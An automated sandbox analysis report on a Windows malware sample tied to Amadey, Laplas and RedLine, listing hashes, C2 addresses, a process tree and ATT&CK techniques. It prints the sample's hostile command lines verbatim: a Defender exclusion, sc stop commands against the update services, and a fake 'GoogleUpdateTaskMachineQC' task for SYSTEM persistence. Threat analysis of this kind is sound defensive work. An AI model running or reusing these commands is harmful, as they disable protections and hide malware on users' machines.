Analysis
max time kernel: 59s
max time network: 153s
platform: windows7_x64
resource: win7-20230712-en
resource tags: arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
submitted: 01-08-2023 23:46

Static task: static1
Behavioral task: behavioral1
  Sample: 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe
  Resource: win7-20230712-en
General
Target: 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe
Size: 6.5MB
MD5: 89e9bc7a5d97370a0f4a35041a54a696
SHA1: c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256: 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512: 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2
SSDEEP: 196608:3PbBDSjGzSuyKff2j6pdVY3d2dZo2tOuAX+W6+B6VJN1lev:3JKGzXuTwdZdLM+JS
Malware Config

Extracted: amadey
  Version: 3.80
  C2: 45.15.156.208/jd9dd3Vw/index.php
  C2: second.amadgood.com/jd9dd3Vw/index.php

Extracted: laplas
  C2: http://206.189.229.43
  api_key: f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload 4 IoCs
  resource | yara_rule
  behavioral1/memory/840-117-0x0000000000170000-0x000000000032F000-memory.dmp | family_redline
  behavioral1/memory/2044-119-0x0000000000400000-0x000000000045A000-memory.dmp | family_redline
  behavioral1/memory/2044-125-0x0000000000400000-0x000000000045A000-memory.dmp | family_redline
  behavioral1/memory/2044-126-0x0000000000400000-0x000000000045A000-memory.dmp | family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  description | pid | Process | procid_target
  PID 1892 created 1244 | 1892 | rdpcllp.exe | 8   (5 identical entries)
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs
  description | ioc | Process
  File created | C:\Windows\System32\drivers\etc\hosts | rdpcllp.exe

Stops running service(s) 3 TTPs

Executes dropped EXE 6 IoCs
  pid | Process
  1272 | oneetx.exe
  840 | taskmask.exe
  1892 | rdpcllp.exe
  3024 | taskhostclp.exe
  1688 | ntlhost.exe
  2512 | oneetx.exe

Loads dropped DLL 9 IoCs
  pid | Process
  2204 | 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe
  1272 | oneetx.exe
  1272 | oneetx.exe
  520 | WerFault.exe
  520 | WerFault.exe
  1272 | oneetx.exe
  1272 | oneetx.exe
  520 | WerFault.exe
  3024 | taskhostclp.exe

Themida (packer) 20 IoCs
  resource | yara_rule
  behavioral1/files/0x0009000000015f38-131.dat | themida
  behavioral1/files/0x0009000000015f38-140.dat | themida
  behavioral1/files/0x0009000000015f38-142.dat | themida
  behavioral1/memory/1892-155-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/memory/1892-154-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/memory/1892-157-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/memory/1892-158-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/memory/1892-159-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/memory/1892-160-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/memory/1892-164-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/memory/1892-183-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/memory/1892-195-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/memory/1892-222-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/files/0x0009000000015f38-256.dat | themida
  behavioral1/memory/1892-259-0x000000013F610000-0x000000014045A000-memory.dmp | themida
  behavioral1/files/0x0008000000016ba6-262.dat | themida
  behavioral1/memory/2792-263-0x000000013F740000-0x000000014058A000-memory.dmp | themida
  behavioral1/files/0x0008000000016ba6-265.dat | themida
  behavioral1/memory/2952-275-0x000000013F740000-0x000000014058A000-memory.dmp | themida
  behavioral1/files/0x0008000000016ba6-299.dat | themida
Adds Run key to start application 2 TTPs 1 IoCs
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1014134971-2480516131-292343513-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | taskhostclp.exe

Drops file in System32 directory 2 IoCs
  description | ioc | Process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  pid | Process
  1892 | rdpcllp.exe
  3024 | taskhostclp.exe
  1688 | ntlhost.exe

Suspicious use of SetThreadContext 1 IoCs
  description | pid | Process | procid_target
  PID 840 set thread context of 2044 | 840 | taskmask.exe | 45

Drops file in Program Files directory 1 IoCs
  description | ioc | Process
  File created | C:\Program Files\Google\Chrome\updater.exe | rdpcllp.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
  pid | Process
  1768 | sc.exe
  2540 | sc.exe
  2040 | sc.exe
  1972 | sc.exe
  1080 | sc.exe
  320 | sc.exe
  1896 | sc.exe
  1660 | sc.exe
  2036 | sc.exe
  2452 | sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
  pid | pid_target | Process | procid_target
  520 | 840 | WerFault.exe | 44

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  2796 | schtasks.exe
  2280 | schtasks.exe
  2104 | schtasks.exe

GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
  description | flow | ioc
  HTTP User-Agent header | 7 | Go-http-client/1.1

Suspicious behavior: EnumeratesProcesses 15 IoCs
  pid | Process
  2204 | 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe
  1272 | oneetx.exe
  1892 | rdpcllp.exe
  1892 | rdpcllp.exe
  3040 | powershell.exe
  1892 | rdpcllp.exe
  1892 | rdpcllp.exe
  2512 | oneetx.exe
  1892 | rdpcllp.exe
  1892 | rdpcllp.exe
  1892 | rdpcllp.exe
  1892 | rdpcllp.exe
  2380 | powershell.exe
  1892 | rdpcllp.exe
  1892 | rdpcllp.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs
  description | pid | Process
  Token: SeDebugPrivilege | 3040 | powershell.exe
  Token: SeShutdownPrivilege | 1568 | powercfg.exe
  Token: SeDebugPrivilege | 2380 | powershell.exe
  Token: SeShutdownPrivilege | 1692 | powercfg.exe
  Token: SeShutdownPrivilege | 2200 | powercfg.exe
  Token: SeShutdownPrivilege | 1216 | powercfg.exe
  Token: SeDebugPrivilege | 2044 | AppLaunch.exe

Suspicious use of FindShellTrayWindow 1 IoCs
  pid | Process
  2204 | 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe

Suspicious use of WriteProcessMemory 64 IoCs
  description | pid | Process | procid_target
  PID 2204 wrote to memory of 1272 | 2204 | 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe | 28   (7 entries)
  PID 1272 wrote to memory of 2280 | 1272 | oneetx.exe | 29   (4 entries)
  PID 1272 wrote to memory of 2996 | 1272 | oneetx.exe | 31   (4 entries)
  PID 2996 wrote to memory of 2536 | 2996 | cmd.exe | 34   (4 entries)
  PID 2996 wrote to memory of 2852 | 2996 | cmd.exe | 35   (4 entries)
  PID 2996 wrote to memory of 2940 | 2996 | cmd.exe | 36   (4 entries)
  PID 2996 wrote to memory of 2952 | 2996 | cmd.exe | 37   (4 entries)
  PID 2996 wrote to memory of 2976 | 2996 | cmd.exe | 38   (4 entries)
  PID 2996 wrote to memory of 1528 | 2996 | cmd.exe | 39   (4 entries)
  PID 1272 wrote to memory of 840 | 1272 | oneetx.exe | 44   (4 entries)
  PID 840 wrote to memory of 2044 | 840 | taskmask.exe | 45   (9 entries)
  PID 840 wrote to memory of 520 | 840 | taskmask.exe | 46   (4 entries)
  PID 1272 wrote to memory of 1892 | 1272 | oneetx.exe | 47   (4 entries)
  PID 1272 wrote to memory of 3024 | 1272 | oneetx.exe | 48   (4 entries)
Processes
(indentation shows the parent/child tree; each entry lists image path, command line and the signatures attributed to that process)

[PID 1244] C:\Windows\Explorer.EXE
    command line: C:\Windows\Explorer.EXE

    [PID 2204] C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe"
        - Loads dropped DLL
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory

        [PID 1272] C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
            command line: "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory

            [PID 2280] C:\Windows\SysWOW64\schtasks.exe
                command line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F
                - Creates scheduled task(s)

            [PID 2996] C:\Windows\SysWOW64\cmd.exe
                command line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit
                - Suspicious use of WriteProcessMemory

                [PID 2536] C:\Windows\SysWOW64\cmd.exe
                    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"

                [PID 2852] C:\Windows\SysWOW64\cacls.exe
                    command line: CACLS "oneetx.exe" /P "Admin:N"

                [PID 2940] C:\Windows\SysWOW64\cacls.exe
                    command line: CACLS "oneetx.exe" /P "Admin:R" /E

                [PID 2952] C:\Windows\SysWOW64\cmd.exe
                    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"

                [PID 2976] C:\Windows\SysWOW64\cacls.exe
                    command line: CACLS "..\eb0f58bce7" /P "Admin:N"

                [PID 1528] C:\Windows\SysWOW64\cacls.exe
                    command line: CACLS "..\eb0f58bce7" /P "Admin:R" /E

            [PID 840] C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
                command line: "C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe"
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
                - Suspicious use of WriteProcessMemory

                [PID 2044] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    - Suspicious use of AdjustPrivilegeToken

                [PID 520] C:\Windows\SysWOW64\WerFault.exe
                    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 36
                    - Loads dropped DLL
                    - Program crash

            [PID 1892] C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
                command line: "C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe"
                - Suspicious use of NtCreateUserProcessOtherParentProcess
                - Drops file in Drivers directory
                - Executes dropped EXE
                - Suspicious use of NtSetInformationThreadHideFromDebugger
                - Drops file in Program Files directory
                - Suspicious behavior: EnumeratesProcesses

            [PID 3024] C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
                command line: "C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe"
                - Executes dropped EXE
                - Loads dropped DLL
                - Adds Run key to start application
                - Suspicious use of NtSetInformationThreadHideFromDebugger

                [PID 1688] C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
                    command line: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
                    - Executes dropped EXE
                    - Suspicious use of NtSetInformationThreadHideFromDebugger

    [PID 3040] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [PID 1168] C:\Windows\System32\cmd.exe
        command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

        [PID 2452] C:\Windows\System32\sc.exe
            command line: sc stop UsoSvc
            - Launches sc.exe

        [PID 320] C:\Windows\System32\sc.exe
            command line: sc stop WaaSMedicSvc
            - Launches sc.exe

        [PID 1080] C:\Windows\System32\sc.exe
            command line: sc stop wuauserv
            - Launches sc.exe

        [PID 1768] C:\Windows\System32\sc.exe
            command line: sc stop bits
            - Launches sc.exe

        [PID 2540] C:\Windows\System32\sc.exe
            command line: sc stop dosvc
            - Launches sc.exe

    [PID 2408] C:\Windows\System32\cmd.exe
        command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

        [PID 1568] C:\Windows\System32\powercfg.exe
            command line: powercfg /x -hibernate-timeout-ac 0
            - Suspicious use of AdjustPrivilegeToken

        [PID 1692] C:\Windows\System32\powercfg.exe
            command line: powercfg /x -hibernate-timeout-dc 0
            - Suspicious use of AdjustPrivilegeToken

        [PID 2200] C:\Windows\System32\powercfg.exe
            command line: powercfg /x -standby-timeout-ac 0
            - Suspicious use of AdjustPrivilegeToken

        [PID 1216] C:\Windows\System32\powercfg.exe
            command line: powercfg /x -standby-timeout-dc 0
            - Suspicious use of AdjustPrivilegeToken

    [PID 2380] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        [PID 2104] C:\Windows\system32\schtasks.exe
            command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            - Creates scheduled task(s)

    [PID 2592] C:\Windows\System32\schtasks.exe
        command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

    [PID 2720] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

    [PID 1968] C:\Windows\System32\cmd.exe
        command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

        [PID 2040] C:\Windows\System32\sc.exe
            command line: sc stop UsoSvc
            - Launches sc.exe

        [PID 1896] C:\Windows\System32\sc.exe
            command line: sc stop WaaSMedicSvc
            - Launches sc.exe

        [PID 1660] C:\Windows\System32\sc.exe
            command line: sc stop wuauserv
            - Launches sc.exe

        [PID 2036] C:\Windows\System32\sc.exe
            command line: sc stop bits
            - Launches sc.exe

        [PID 1972] C:\Windows\System32\sc.exe
            command line: sc stop dosvc
            - Launches sc.exe

    [PID 2000] C:\Windows\System32\cmd.exe
        command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

        [PID 2012] C:\Windows\System32\powercfg.exe
            command line: powercfg /x -hibernate-timeout-ac 0

        [PID 2304] C:\Windows\System32\powercfg.exe
            command line: powercfg /x -hibernate-timeout-dc 0

        [PID 1944] C:\Windows\System32\powercfg.exe
            command line: powercfg /x -standby-timeout-ac 0

        [PID 3016] C:\Windows\System32\powercfg.exe
            command line: powercfg /x -standby-timeout-dc 0

    [PID 1920] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

        [PID 2796] C:\Windows\system32\schtasks.exe
            command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            - Creates scheduled task(s)

    [PID 2804] C:\Windows\System32\conhost.exe
        command line: C:\Windows\System32\conhost.exe

    [PID 1668] C:\Windows\explorer.exe
        command line: C:\Windows\explorer.exe

[PID 1636] C:\Windows\system32\taskeng.exe
    command line: taskeng.exe {711DAF88-722F-4BCC-8C50-64543DFFCBB9} S-1-5-21-1014134971-2480516131-292343513-1000:NYBYVYTJ\Admin:Interactive:[1]

    [PID 2512] C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
        command line: C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses

    [PID 2052] C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
        command line: C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

[PID 2792] C:\Windows\system32\taskeng.exe
    command line: taskeng.exe {3A18D9A7-9B42-40AB-AD7D-16FDB4AF1E6A} S-1-5-18:NT AUTHORITY\System:Service:

    [PID 2952] C:\Program Files\Google\Chrome\updater.exe
        command line: "C:\Program Files\Google\Chrome\updater.exe"
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)
  Scheduled Task/Job (1)
Downloads
(one entry per distinct file; where the report repeats an entry with identical hashes, the count is given)

Filesize: 8.4MB   (7 identical entries)
  MD5: 768200a76def472e675539094047bed9
  SHA1: 24bc17689541656a8a12902c7f19bd991193ca50
  SHA256: 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
  SHA512: 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

Filesize: 68KB
  MD5: 16895764e0a96a72015b4e5402ee185c
  SHA1: 8124725156ce79aafe2a008134ed3c966fc8b961
  SHA256: f61263093b51ac102308dfc926ac63b529ccffeb260dc20437533c80e2fba46d
  SHA512: 7dcb5acf20b6c6abb0569b804413ccb89451a04fc74356bdeb33fc89069e7a5b198bcac524943fc2a3576f7eb548be38849208b949181fd1fa62e76c8b60941b

Filesize: 1.7MB   (7 identical entries)
  MD5: f8f7c8c4cc25ba49c5b591aab8bfdc04
  SHA1: 6ed43db5ba58257c1283abfa8a08290ccf896033
  SHA256: 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
  SHA512: 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

Filesize: 4.0MB   (4 identical entries)
  MD5: 3258deefff3ca70f3dfa3e67067ca611
  SHA1: a28ec103c22b03f381dd72073cf620b11881b7b7
  SHA256: 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
  SHA512: 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

Filesize: 6.5MB   (6 identical entries; same hashes as the submitted sample)
  MD5: 89e9bc7a5d97370a0f4a35041a54a696
  SHA1: c0e8572f48b2e5f83c39374f4175e35a5e7c2029
  SHA256: 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
  SHA512: 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 96aacfb1cbe0eb8dfff965c5d20ffbd6
  SHA1: 8c78cb2281006312b51327a4355f3348993caf52
  SHA256: 98c921d4d4f9cad2da010a2da17b2488cb244ba06f0d04f2181256f1afee3e19
  SHA512: d8794e98f7d67ac27adc09cef3bad97a9afd3143269ff6a96718d4e9ef7130a97fae23abb7f4bc26a13a6ecd8d98a32cc817e016e6ac589a68de4d1644a5185e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VD1AX5WJEHO2R5CIPBWT.temp
  Filesize: 7KB
  MD5: 96aacfb1cbe0eb8dfff965c5d20ffbd6
  SHA1: 8c78cb2281006312b51327a4355f3348993caf52
  SHA256: 98c921d4d4f9cad2da010a2da17b2488cb244ba06f0d04f2181256f1afee3e19
  SHA512: d8794e98f7d67ac27adc09cef3bad97a9afd3143269ff6a96718d4e9ef7130a97fae23abb7f4bc26a13a6ecd8d98a32cc817e016e6ac589a68de4d1644a5185e

Filesize: 614.6MB
  MD5: 3de8733baaf72b71b2dc206361d57d49
  SHA1: e56011ae28e2bc957f1b96537b478f221f68b06d
  SHA256: 8be2829f835bc11d2c6e9953cfaa7c4c216e307a34a3c7e64bb8a785748e18f6
  SHA512: 355d9b748a7720aa8ca5b73d116af9849f395786ca71af2d44d183da1df51022ad02aaa49f1f2cdd5cc2bff664fcc8d33a3258ad91afd8f4d6ef2b56f5827196

Filesize: 2KB
  MD5: 3e9af076957c5b2f9c9ce5ec994bea05
  SHA1: a8c7326f6bceffaeed1c2bb8d7165e56497965fe
  SHA256: e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
  SHA512: 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

Filesize: 637.3MB
  MD5: c3944a1e56f3c41bd7957fe045472ce8
  SHA1: ad17123ad2b3f4d9a516c93b88d42930c047bb85
  SHA256: e27f51358d373b0b6cdf3e32f38bf3c836113fdbde4756ea26d0a4d1f4e101fb
  SHA512: 323bb4670d7dc3ef3b354cc724f9538dd683f221310ee96c78f01fc4680bade3c7628711af5ba0ff03c1584fc7cb5363f10faef9c8578e0bb632dc8d1657d057